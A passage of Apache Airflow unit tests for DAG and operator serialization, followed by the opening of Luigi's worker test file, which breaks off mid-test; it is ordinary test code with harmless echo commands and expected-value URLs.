            'next_execution_date': compute_next_execution_date,
        },
        user_defined_filters={'hello': lambda name: f'Hello {name}'},
        catchup=False,
    )
    BashOperator(
        task_id='echo',
        bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
        dag=dag,
    )
    return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
dag_field = getattr(dag, field)
if isinstance(dag_field, list):
dag_field = sorted(dag_field)
assert getattr(serialized_dag, field) == dag_field, f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@parameterized.expand(
[
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
]
)
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.schedule_interval == expected_schedule_interval
assert dag.normalized_schedule_interval == expected_n_schedule_interval
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]
else:
assert "params" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params
assert expected_val == deserialized_simple_task.params
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link,
it can still deserialize the DAG (does not error) but just logs an error
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks", "has_on_success_callback", "has_on_failure_callback"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
@parameterized.expand(
[
("poke", False),
("reschedule", True),
]
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@parameterized.expand(
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_success_callback is set to True.
When the callback is not set, has_on_success_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@parameterized.expand(
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_failure_callback is set to True.
When the callback is not set, has_on_failure_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@parameterized.expand(
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
]
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Lists, Sets and Tuples are sorted"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
worker_test.py | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import email.parser
import functools
import logging
import os
import shutil
import signal
import tempfile
import threading
import time
import psutil
from helpers import (unittest, with_config, skipOnTravis, LuigiTestCase,
temporary_unloaded_module)
import luigi.notifications
import luigi.task_register
import luigi.worker
import mock
from luigi import ExternalTask, RemoteScheduler, Task, Event
from luigi.mock import MockTarget, MockFileSystem
from luigi.scheduler import Scheduler
from luigi.worker import Worker
from luigi.rpc import RPCError
from luigi import six
from luigi.cmdline import luigi_run
luigi.notifications.DEBUG = True
class DummyTask(Task):
def __init__(self, *args, **kwargs):
super(DummyTask, self).__init__(*args, **kwargs)
self.has_run = False
def complete(self):
return self.has_run
def run(self):
logging.debug("%s - setting has_run", self)
self.has_run = True
class DynamicDummyTask(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.p)
def run(self):
with self.output().open('w') as f:
f.write('Done!')
time.sleep(0.5) # so we can benchmark & see if parallelization works
class DynamicDummyTaskWithNamespace(DynamicDummyTask):
task_namespace = 'banana'
class DynamicRequires(Task):
p = luigi.Parameter()
use_banana_task = luigi.BoolParameter(default=False)
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'parent'))
def run(self):
if self.use_banana_task:
task_cls = DynamicDummyTaskWithNamespace
else:
task_cls = DynamicDummyTask
dummy_targets = yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5)]
dummy_targets += yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5, 7)]
with self.output().open('w') as f:
for i, d in enumerate(dummy_targets):
for line in d.open('r'):
print('%d: %s' % (i, line.strip()), file=f)
class DynamicRequiresOtherModule(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'baz'))
def run(self):
import other_module
other_target_foo = yield other_module.OtherModuleTask(os.path.join(self.p, 'foo')) # NOQA
other_target_bar = yield other_module.OtherModuleTask(os.path.join(self.p, 'bar')) # NOQA
with self.output().open('w') as f:
f.write('Done!')
class DummyErrorTask(Task):
retry_index = 0
def run(self):
self.retry_index += 1
raise Exception("Retry index is %s for %s" % (self.retry_index, self.task_family))
class WorkerTest(LuigiTestCase):
    """Core tests for Worker behavior: dependency resolution, external and
    externalized tasks, failures, batch parameters and interleaved workers.
    """

    def run(self, result=None):
        # Wrap every test with a fresh scheduler plus two workers (X and Y),
        # and restore time.time afterwards in case a test patched it via
        # setTime().
        self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
        self.time = time.time
        with Worker(scheduler=self.sch, worker_id='X') as w, Worker(scheduler=self.sch, worker_id='Y') as w2:
            self.w = w
            self.w2 = w2
            super(WorkerTest, self).run(result)
        if time.time != self.time:
            time.time = self.time

    def setTime(self, t):
        # Monkey-patch time.time to a fixed value; run() restores the original.
        time.time = lambda: t

    def test_dep(self):
        class A(Task):
            def run(self):
                self.has_run = True

            def complete(self):
                return self.has_run
        a = A()

        class B(Task):
            def requires(self):
                return a

            def run(self):
                self.has_run = True

            def complete(self):
                return self.has_run
        b = B()
        a.has_run = False
        b.has_run = False
        self.assertTrue(self.w.add(b))
        self.assertTrue(self.w.run())
        self.assertTrue(a.has_run)
        self.assertTrue(b.has_run)

    def test_external_dep(self):
        # An incomplete ExternalTask dependency blocks its dependents.
        class A(ExternalTask):
            def complete(self):
                return False
        a = A()

        class B(Task):
